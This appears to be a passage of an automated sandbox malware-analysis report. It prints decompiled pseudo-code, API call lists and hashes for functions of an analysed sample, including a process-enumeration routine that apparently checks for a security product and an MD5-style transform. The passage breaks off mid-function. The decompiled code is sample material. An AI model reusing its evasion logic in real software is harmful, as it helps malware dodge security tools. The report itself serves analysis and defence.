                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd8b966bc03757c718068f1bb156bbfbe020a309e87d7ffb64df3874b978a349
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB016836210214AAEF80BFE6CC80A7B729DEB41368F50003AFB44C6240CF61DD929764
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E026F46B8(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                        					_t15 = E026F59CA(_a4, _a8, _a12, __edi); // executed
                                                                                                                                                                                                                        					_t26 = _t15;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t26 = E026F424B(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                                                                                                                                                                                        					if(_t26 == 0) {
                                                                                                                                                                                                                        						_t23 = _a8 >> 1;
                                                                                                                                                                                                                        						if(_t23 == 0) {
                                                                                                                                                                                                                        							_t26 = 2;
                                                                                                                                                                                                                        							HeapFree( *0x26fd238, 0, _a12);
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t21 = _a12;
                                                                                                                                                                                                                        							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                                                                                                                                                                                                        							 *__edi = _t21;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t26;
                                                                                                                                                                                                                        			}







                                                                                                                                                                                                                        0x026f46c0
                                                                                                                                                                                                                        0x026f4717
                                                                                                                                                                                                                        0x026f471c
                                                                                                                                                                                                                        0x026f46c2
                                                                                                                                                                                                                        0x026f46dc
                                                                                                                                                                                                                        0x026f46e0
                                                                                                                                                                                                                        0x026f46e5
                                                                                                                                                                                                                        0x026f46e7
                                                                                                                                                                                                                        0x026f46f9
                                                                                                                                                                                                                        0x026f4705
                                                                                                                                                                                                                        0x026f46e9
                                                                                                                                                                                                                        0x026f46e9
                                                                                                                                                                                                                        0x026f46ee
                                                                                                                                                                                                                        0x026f46f3
                                                                                                                                                                                                                        0x026f46f3
                                                                                                                                                                                                                        0x026f46e7
                                                                                                                                                                                                                        0x026f46e0
                                                                                                                                                                                                                        0x026f4722

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,026F6ABC,?,004F0053,04B39358,00000000,?), ref: 026F4705
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                        • Opcode ID: d346b286151d069058bd88a2a9e8a2c2e0fe3e3e77ca39694afe0dc518143634
                                                                                                                                                                                                                        • Instruction ID: b5468af8ff57afbe215369b817bfc5453dcee8f9710262ac472bbf5ebaaa0a58
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d346b286151d069058bd88a2a9e8a2c2e0fe3e3e77ca39694afe0dc518143634
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E014B32100259ABCF619F98CC45FAB3B76EF44360F048429FB199A560DB319921DB80
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                                        			E026F3B9B(intOrPtr* __edi) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                        				intOrPtr _t15;
                                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t21 = __edi;
                                                                                                                                                                                                                        				_push( &_v12);
                                                                                                                                                                                                                        				_push(__edi);
                                                                                                                                                                                                                        				_v8 = 0x1d4c0;
                                                                                                                                                                                                                        				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                        					_v16 = _t15;
                                                                                                                                                                                                                        					Sleep(0x1f4); // executed
                                                                                                                                                                                                                        					if(_v12 == 4) {
                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_v8 == 0) {
                                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                                        						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						if(_v8 <= 0x1f4) {
                                                                                                                                                                                                                        							_v16 = 0x80004004;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                                        					return _v16;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                                        			}








                                                                                                                                                                                                                        0x026f3b9b
                                                                                                                                                                                                                        0x026f3ba8
                                                                                                                                                                                                                        0x026f3ba9
                                                                                                                                                                                                                        0x026f3baa
                                                                                                                                                                                                                        0x026f3bb1
                                                                                                                                                                                                                        0x026f3bdf
                                                                                                                                                                                                                        0x026f3be0
                                                                                                                                                                                                                        0x026f3be3
                                                                                                                                                                                                                        0x026f3be9
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f3bc8
                                                                                                                                                                                                                        0x026f3bd2
                                                                                                                                                                                                                        0x026f3bd9
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f3bca
                                                                                                                                                                                                                        0x026f3bcd
                                                                                                                                                                                                                        0x026f3bed
                                                                                                                                                                                                                        0x026f3bcf
                                                                                                                                                                                                                        0x026f3bcf
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f3bcf
                                                                                                                                                                                                                        0x026f3bcd
                                                                                                                                                                                                                        0x026f3bf4
                                                                                                                                                                                                                        0x026f3bfa
                                                                                                                                                                                                                        0x026f3bfa
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 026F3BE3
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                                                                        • Opcode ID: 4a62b382f79bf29f2818998617cc666b1c6e41806a709518bebeb0bd3590fbda
                                                                                                                                                                                                                        • Instruction ID: 9f88250ba4ab729c09917ce55a374840ac5c19b0091f5706939b511c3d1166df
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a62b382f79bf29f2818998617cc666b1c6e41806a709518bebeb0bd3590fbda
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BAF03C75D01298EFCF10EBD8C598AEDB7B8EF14204F1080EAE60263240D3B45B90CF51
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E026F8779(void* __edx, void* __edi, void* _a4) {
                                                                                                                                                                                                                        				int _t7;
                                                                                                                                                                                                                        				int _t13;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t7 = E026FA4CA(__edx, __edi, _a4,  &_a4); // executed
                                                                                                                                                                                                                        				_t13 = _t7;
                                                                                                                                                                                                                        				if(_t13 != 0) {
                                                                                                                                                                                                                        					memcpy(__edi, _a4, _t13);
                                                                                                                                                                                                                        					 *((char*)(__edi + _t13)) = 0;
                                                                                                                                                                                                                        					E026F45B3(_a4);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t13;
                                                                                                                                                                                                                        			}





                                                                                                                                                                                                                        0x026f8785
                                                                                                                                                                                                                        0x026f878a
                                                                                                                                                                                                                        0x026f878e
                                                                                                                                                                                                                        0x026f8795
                                                                                                                                                                                                                        0x026f87a0
                                                                                                                                                                                                                        0x026f87a4
                                                                                                                                                                                                                        0x026f87a4
                                                                                                                                                                                                                        0x026f87ad

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 026FA4CA: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 026FA500
                                                                                                                                                                                                                          • Part of subcall function 026FA4CA: memset.NTDLL ref: 026FA575
                                                                                                                                                                                                                          • Part of subcall function 026FA4CA: memset.NTDLL ref: 026FA589
                                                                                                                                                                                                                        • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,026F5C08,?,?,026F6223,00000002,?,?,?), ref: 026F8795
                                                                                                                                                                                                                          • Part of subcall function 026F45B3: HeapFree.KERNEL32(00000000,00000000,026F5DE9,00000000,?,?,-00000008), ref: 026F45BF
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpymemset$FreeHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3053036209-0
                                                                                                                                                                                                                        • Opcode ID: cd736b5b122ae7b26c4d9f2ee90f3773760ba8359180082cd5877326d73c2e8e
                                                                                                                                                                                                                        • Instruction ID: 408e59d28c5fa4f620c9943ffa6f2630487558734e1ece821c32139972d40840
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd736b5b122ae7b26c4d9f2ee90f3773760ba8359180082cd5877326d73c2e8e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AE04636800128BACF522A94DC00AEBBE6E8B52690F004028FF0C9A200D621CA209BE5
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                        			E026F5946() {
                                                                                                                                                                                                                        				char _v264;
                                                                                                                                                                                                                        				void* _v300;
                                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t15 = 0;
                                                                                                                                                                                                                        				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                        				if(_t17 != 0) {
                                                                                                                                                                                                                        					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                                                        					while(_t8 != 0) {
                                                                                                                                                                                                                        						_t9 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        						_t2 = _t9 + 0x26fee28; // 0x73617661
                                                                                                                                                                                                                        						_push( &_v264);
                                                                                                                                                                                                                        						if( *0x26fd0fc() != 0) {
                                                                                                                                                                                                                        							_t15 = 1;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                                        						CloseHandle(_t17);
                                                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				L8:
                                                                                                                                                                                                                        				return _t15;
                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                        0x026f5951
                                                                                                                                                                                                                        0x026f595b
                                                                                                                                                                                                                        0x026f595f
                                                                                                                                                                                                                        0x026f5969
                                                                                                                                                                                                                        0x026f599a
                                                                                                                                                                                                                        0x026f5970
                                                                                                                                                                                                                        0x026f5975
                                                                                                                                                                                                                        0x026f5982
                                                                                                                                                                                                                        0x026f598b
                                                                                                                                                                                                                        0x026f59a2
                                                                                                                                                                                                                        0x026f598d
                                                                                                                                                                                                                        0x026f5995
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5995
                                                                                                                                                                                                                        0x026f59a3
                                                                                                                                                                                                                        0x026f59a4
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f59a4
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f599e
                                                                                                                                                                                                                        0x026f59aa
                                                                                                                                                                                                                        0x026f59af

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 026F5956
                                                                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 026F5969
                                                                                                                                                                                                                        • Process32Next.KERNEL32(00000000,?), ref: 026F5995
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 026F59A4
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                                                                                                        • Opcode ID: 54e6cfac87a5db9c9ba14b5f85046b4f720ca2bae9243285d34a557446e3a6d4
                                                                                                                                                                                                                        • Instruction ID: df79346b3fdd763ec15504478c4c9acb6c19dfc9d1d0d57e07262fc2f3473ff7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54e6cfac87a5db9c9ba14b5f85046b4f720ca2bae9243285d34a557446e3a6d4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DBF0BB72901165AADFA0A7669C48EEF776CDBC5320F810056EF4BD2100E730DD978AB9
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E021910D8() {
                                                                                                                                                                                                                        				void* _t1;
                                                                                                                                                                                                                        				unsigned int _t3;
                                                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                                                        				long _t5;
                                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                                        				intOrPtr _t10;
                                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t10 =  *0x2194130;
                                                                                                                                                                                                                        				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                        				 *0x219413c = _t1;
                                                                                                                                                                                                                        				if(_t1 == 0) {
                                                                                                                                                                                                                        					return GetLastError();
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t3 = GetVersion();
                                                                                                                                                                                                                        				if(_t3 != 5) {
                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                        					if(_t14 <= 0) {
                                                                                                                                                                                                                        						_t4 = 0x32;
                                                                                                                                                                                                                        						return _t4;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					if(_t3 >> 8 > 0) {
                                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                                        						 *0x219412c = _t3;
                                                                                                                                                                                                                        						_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                        						 *0x2194128 = _t5;
                                                                                                                                                                                                                        						 *0x2194130 = _t10;
                                                                                                                                                                                                                        						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                        						 *0x2194124 = _t6;
                                                                                                                                                                                                                        						if(_t6 == 0) {
                                                                                                                                                                                                                        							 *0x2194124 =  *0x2194124 | 0xffffffff;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t14 = _t3 - _t3;
                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                        0x021910d9
                                                                                                                                                                                                                        0x021910e7
                                                                                                                                                                                                                        0x021910ed
                                                                                                                                                                                                                        0x021910f4
                                                                                                                                                                                                                        0x0219114b
                                                                                                                                                                                                                        0x0219114b
                                                                                                                                                                                                                        0x021910f6
                                                                                                                                                                                                                        0x021910fe
                                                                                                                                                                                                                        0x0219110b
                                                                                                                                                                                                                        0x0219110b
                                                                                                                                                                                                                        0x02191147
                                                                                                                                                                                                                        0x02191149
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191100
                                                                                                                                                                                                                        0x02191107
                                                                                                                                                                                                                        0x0219110d
                                                                                                                                                                                                                        0x0219110d
                                                                                                                                                                                                                        0x02191112
                                                                                                                                                                                                                        0x02191120
                                                                                                                                                                                                                        0x02191125
                                                                                                                                                                                                                        0x0219112b
                                                                                                                                                                                                                        0x02191131
                                                                                                                                                                                                                        0x02191138
                                                                                                                                                                                                                        0x0219113a
                                                                                                                                                                                                                        0x0219113a
                                                                                                                                                                                                                        0x02191144
                                                                                                                                                                                                                        0x02191109
                                                                                                                                                                                                                        0x02191109
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191109
                                                                                                                                                                                                                        0x02191107

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,02191F23), ref: 021910E7
                                                                                                                                                                                                                        • GetVersion.KERNEL32(?,02191F23), ref: 021910F6
                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,02191F23), ref: 02191112
                                                                                                                                                                                                                        • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,02191F23), ref: 0219112B
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 845504543-0
                                                                                                                                                                                                                        • Opcode ID: dc096fe5c8e3d674015eba36c516b5fa576359cf3a93d2cde0df7f928696d6b4
                                                                                                                                                                                                                        • Instruction ID: c1908998ed119d6929a92fffd97c2ba6560da88d451d8d40fa89e9f8afc17afb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc096fe5c8e3d674015eba36c516b5fa576359cf3a93d2cde0df7f928696d6b4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCF04FB1EC0302BBDF215B78BC1975B3BE0A705B26F140976E656E61C4D77064E28F48
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 49%
                                                                                                                                                                                                                        			E026F15CD(void* __ecx, intOrPtr* _a4) {
                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                                                                        				intOrPtr _v72;
                                                                                                                                                                                                                        				void _v76;
                                                                                                                                                                                                                        				intOrPtr* _t226;
                                                                                                                                                                                                                        				signed int _t229;
                                                                                                                                                                                                                        				signed int _t231;
                                                                                                                                                                                                                        				signed int _t233;
                                                                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                                                                        				signed int _t237;
                                                                                                                                                                                                                        				signed int _t239;
                                                                                                                                                                                                                        				signed int _t241;
                                                                                                                                                                                                                        				signed int _t243;
                                                                                                                                                                                                                        				signed int _t245;
                                                                                                                                                                                                                        				signed int _t247;
                                                                                                                                                                                                                        				signed int _t249;
                                                                                                                                                                                                                        				signed int _t251;
                                                                                                                                                                                                                        				signed int _t253;
                                                                                                                                                                                                                        				signed int _t255;
                                                                                                                                                                                                                        				signed int _t257;
                                                                                                                                                                                                                        				signed int _t259;
                                                                                                                                                                                                                        				signed int _t338;
                                                                                                                                                                                                                        				signed char* _t348;
                                                                                                                                                                                                                        				signed int _t349;
                                                                                                                                                                                                                        				signed int _t351;
                                                                                                                                                                                                                        				signed int _t353;
                                                                                                                                                                                                                        				signed int _t355;
                                                                                                                                                                                                                        				signed int _t357;
                                                                                                                                                                                                                        				signed int _t359;
                                                                                                                                                                                                                        				signed int _t361;
                                                                                                                                                                                                                        				signed int _t363;
                                                                                                                                                                                                                        				signed int _t365;
                                                                                                                                                                                                                        				signed int _t367;
                                                                                                                                                                                                                        				signed int _t376;
                                                                                                                                                                                                                        				signed int _t378;
                                                                                                                                                                                                                        				signed int _t380;
                                                                                                                                                                                                                        				signed int _t382;
                                                                                                                                                                                                                        				signed int _t384;
                                                                                                                                                                                                                        				intOrPtr* _t400;
                                                                                                                                                                                                                        				signed int* _t401;
                                                                                                                                                                                                                        				signed int _t402;
                                                                                                                                                                                                                        				signed int _t404;
                                                                                                                                                                                                                        				signed int _t406;
                                                                                                                                                                                                                        				signed int _t408;
                                                                                                                                                                                                                        				signed int _t410;
                                                                                                                                                                                                                        				signed int _t412;
                                                                                                                                                                                                                        				signed int _t414;
                                                                                                                                                                                                                        				signed int _t416;
                                                                                                                                                                                                                        				signed int _t418;
                                                                                                                                                                                                                        				signed int _t420;
                                                                                                                                                                                                                        				signed int _t422;
                                                                                                                                                                                                                        				signed int _t424;
                                                                                                                                                                                                                        				signed int _t432;
                                                                                                                                                                                                                        				signed int _t434;
                                                                                                                                                                                                                        				signed int _t436;
                                                                                                                                                                                                                        				signed int _t438;
                                                                                                                                                                                                                        				signed int _t440;
                                                                                                                                                                                                                        				signed int _t508;
                                                                                                                                                                                                                        				signed int _t599;
                                                                                                                                                                                                                        				signed int _t607;
                                                                                                                                                                                                                        				signed int _t613;
                                                                                                                                                                                                                        				signed int _t679;
                                                                                                                                                                                                                        				void* _t682;
                                                                                                                                                                                                                        				signed int _t683;
                                                                                                                                                                                                                        				signed int _t685;
                                                                                                                                                                                                                        				signed int _t690;
                                                                                                                                                                                                                        				signed int _t692;
                                                                                                                                                                                                                        				signed int _t697;
                                                                                                                                                                                                                        				signed int _t699;
                                                                                                                                                                                                                        				signed int _t718;
                                                                                                                                                                                                                        				signed int _t720;
                                                                                                                                                                                                                        				signed int _t722;
                                                                                                                                                                                                                        				signed int _t724;
                                                                                                                                                                                                                        				signed int _t726;
                                                                                                                                                                                                                        				signed int _t728;
                                                                                                                                                                                                                        				signed int _t734;
                                                                                                                                                                                                                        				signed int _t740;
                                                                                                                                                                                                                        				signed int _t742;
                                                                                                                                                                                                                        				signed int _t744;
                                                                                                                                                                                                                        				signed int _t746;
                                                                                                                                                                                                                        				signed int _t748;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t226 = _a4;
                                                                                                                                                                                                                        				_t348 = __ecx + 2;
                                                                                                                                                                                                                        				_t401 =  &_v76;
                                                                                                                                                                                                                        				_t682 = 0x10;
                                                                                                                                                                                                                        				do {
                                                                                                                                                                                                                        					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                                                                                                                                                                                                        					_t401 =  &(_t401[1]);
                                                                                                                                                                                                                        					_t348 =  &(_t348[4]);
                                                                                                                                                                                                                        					_t682 = _t682 - 1;
                                                                                                                                                                                                                        				} while (_t682 != 0);
                                                                                                                                                                                                                        				_t6 = _t226 + 4; // 0x14eb3fc3
                                                                                                                                                                                                                        				_t683 =  *_t6;
                                                                                                                                                                                                                        				_t7 = _t226 + 8; // 0x8d08458b
                                                                                                                                                                                                                        				_t402 =  *_t7;
                                                                                                                                                                                                                        				_t8 = _t226 + 0xc; // 0x56c1184c
                                                                                                                                                                                                                        				_t349 =  *_t8;
                                                                                                                                                                                                                        				asm("rol eax, 0x7");
                                                                                                                                                                                                                        				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                                                                                                                                                                                                        				asm("rol ecx, 0xc");
                                                                                                                                                                                                                        				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                                                                                                                                                                                                        				asm("ror edx, 0xf");
                                                                                                                                                                                                                        				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                                                                                                                                                                                                        				asm("ror esi, 0xa");
                                                                                                                                                                                                                        				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                                                                                                                                                                                                        				_v8 = _t685;
                                                                                                                                                                                                                        				_t690 = _v8;
                                                                                                                                                                                                                        				asm("rol eax, 0x7");
                                                                                                                                                                                                                        				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                                                                                                                                                                                                        				asm("rol ecx, 0xc");
                                                                                                                                                                                                                        				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                                                                                                                                                                                                        				asm("ror edx, 0xf");
                                                                                                                                                                                                                        				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                                                                                                                                                                                                        				asm("ror esi, 0xa");
                                                                                                                                                                                                                        				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                                                                                                                                                                                                        				_v8 = _t692;
                                                                                                                                                                                                                        				_t697 = _v8;
                                                                                                                                                                                                                        				asm("rol eax, 0x7");
                                                                                                                                                                                                                        				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                                                                                                                                                                                                        				asm("rol ecx, 0xc");
                                                                                                                                                                                                                        				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                                                                                                                                                                                                        				asm("ror edx, 0xf");
                                                                                                                                                                                                                        				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
